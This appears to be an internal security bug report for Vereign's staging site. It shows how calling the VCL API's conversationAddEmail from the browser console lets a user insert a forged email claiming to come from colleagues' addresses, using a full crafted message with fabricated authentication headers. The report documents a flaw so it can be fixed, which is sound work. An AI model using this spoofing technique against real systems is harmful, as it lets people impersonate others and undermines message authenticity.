Check that user doesn't have the ability to create a fake email. As an example user had ability to add an email to the Vereign without real sending email from Gmail by using direct VCL API
-
Go to any env. From example https://staging.vereign.com
-
Getting access to the VCL:
lib = await window.setupViamAPI(
"root",
{
onEvent: () => {}
},
`${document.location.origin}/vcl/js/iframe`,
`${document.location.origin}/api/`,
`${document.location.origin}/wopi/`,
`${document.location.origin}`
)- For now the User able to add conversation to the system by calling conversationAddEmail with some prepared message.
In the example bellow you can see that I used two emails in the From field: gospodin.bodurov@vereign.com,kalin.canov@vereign.com, and one email in the To field: alexey.lunin@vereign.com
So in our system this message is displayed as message which was sent from above two addresses.
send = async (passportId, messageId) => {
return await lib.conversationAddEmail(passportId, `Delivered-To: example@example.com
Received: by 2002:a4f:f651:0:0:0:0:0 with SMTP id c17csp869211ivp;
Mon, 1 Apr 2019 15:19:05 -0700 (PDT)
X-Google-Smtp-Source: APXvYqxH/ypATs94L1JJKnqdeoXCP3xprGTgaqlMfN4RVQs6oZXs3OU459etudz7udpaYH6c+Mro
X-Received: by 2002:a50:b309:: with SMTP id q9mr43778263edd.91.1554157144953;
Mon, 01 Apr 2019 15:19:04 -0700 (PDT)
ARC-Seal: i=1; a=rsa-sha256; t=1554157144; cv=none;
d=google.com; s=arc-20160816;
b=HkM1GJyThICcJ6P51pPkegCoQqoXzpy6+93fYLEK1zYf8aKaZJqMPWn+6S31oQc0x8
zszOmUoMlM3mrn7BIGNNtnnJeBjJujltM68prWe7Xf/iRE1NIHpLLaw8AdEHicmPKuyK
dRTMfbuxXfl4pGSdO3kd+MU2Z/ftq6sedlwNgsUwziNA8mQ7CLTTCHrX2emSalIX6ao8
PLGVD2IGTuIhfI+9vt4VCRPXIEYZ0WmCEVtCk1UYiSIGQQBCJUTeVRHUsuez3WbZy+Bm
ipG8G5guW6v0ITQtTLNkDFsRdr2jcUcyWlJNc/gaTtdjq3iaBTu/gRt4qK/mHIfWiDkb
HwGA==
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
h=to:subject:mime-version:message-id:from:date:dkim-signature
:mime-version;
bh=PpaT4m835AW80DsP2mo2xZT/LYgNpBTg/TeA1fTy0vI=;
b=Sa2Efe1rL8J6OHXHx2BFRIje2ROT+Q6BrdDoW5ySvvKtHYtTa/ztgWB0kJTmWw1tOL
Rybn8or7vzo2bCUrWp+qMmnzjFiRyyuLColBQKMg8FWH9jB0/2Ju2TsirgiDtywGaPXr
IGR7K62hySlqWeCskDW84N4aWaiszqD7C0n6K55ofCPpEBvCcY8gER6AFloJt7g/YBdu
2so3aipQPUM1B9OqfngMOgR9LlQ2GbjyvGckvfCt47ZsBWK9yntPCfhwMAtU1oWmeWKV
k1arETsmUymnDKmd6hu2kjXEsgDZMg4xfoHHFVI4Bd0P+RZ4aEAmXzcPQ6R6Es6RfdBf
++gw==
ARC-Authentication-Results: i=1; mx.google.com;
dkim=pass header.i=@gmail.com header.s=dc1 header.b="HcK939/F";
spf=pass (: domain of alexey.lunin@vereign.com designates 0.0.0.0 as permitted sender) smtp.mailfrom=example@example.com
Return-Path: <example@example.com>
Received: from example.com (dc1.example.com. [0.0.0.])
by mx.google.com with ESMTPS id p7si128062edm.32.2019.04.01.15.19.04
for <example@example.com>
(version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
Mon, 01 Apr 2019 15:19:04 -0700 (PDT)
Received-SPF: pass (google.com: domain of example@example.com designates 0.0.0.0 as permitted sender) client-ip=0.0.0.0;
Authentication-Results: mx.example.com;
dkim=pass header.i=@example.com header.s=dc1 header.b="HcK939/F";
spf=pass (example.com: domain of example@example.com designates 0.0.0.0 as permitted sender) smtp.mailfrom=example@example.com
MIME-Version: 1.0
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=vereign.com; s=dc1;
t=1554157143; bh=iFoLXx49XxW84s0w5bUyL8lo3y8Od4fHlKuFW9yWPTU=;
h=Date:From:Subject:To;
b=HcK939/Ft71xO/AR6Uhb5mPDR1ukfE4qrAU8cNxicxpiZogYjNqOTPGysneIT3os/
unRVcWvAVv1DXZsNFsbEd8r6476mi9aem1OGRp5SGntVSVZOHsFKOuYTuraRKOKKB1
/rUEUinaJe96ZDzjUty5WdX3c8q4eRN91EDREay8=
Date: Tue, 02 Apr 2019 02:19:00 +0400
From: gospodin.bodurov@vereign.com,kalin.canov@vereign.com
Message-Id: <fc084f35441ba5${messageId}@example.com>
Mime-Version: 1.0
Subject: [Security] Checking archiving email without real email sending
To: alexey.lunin@vereign.com
--=_d2d1e6ddf837fd97c34cc2953b26d72d
Content-Type: multipart/related; boundary="3fa1d0258d6e0c8cd3b6c983df6c007a9c19d2d68379efef3ad72df6ea6e"
--3fa1d0258d6e0c8cd3b6c983df6c007a9c19d2d68379efef3ad72df6ea6e
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable
<html><head><title>Vereign - Authentic Communication</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3DUTF-8" />=
</head><body style=3D'font-size: 10pt; font-family: Verdana,Geneva,sans-ser=
if'>
<p>Just checking that I can send a message from gospodin.bodurov@vereign.com and kalin.canov@vereign.com accounts without accessing to them with using my personal passport id</p>
</body></html>
--3fa1d0258d6e0c8cd3b6c983df6c007a9c19d2d68379efef3ad72df6ea6e--
--=_d2d1e6ddf837fd97c34cc2953b26d72d--
--W0RyLiBEYW15YW4gTWl0ZXZd--ck5GzsRpPFPCGD5mmbat8rPQSG0y1wq5GemKV--
Vereign - Authentic Communication`)
}
await send("7a1a1be2-a937-44bb-81db-64e82809b793", Math.random())Edited by Alexey Lunin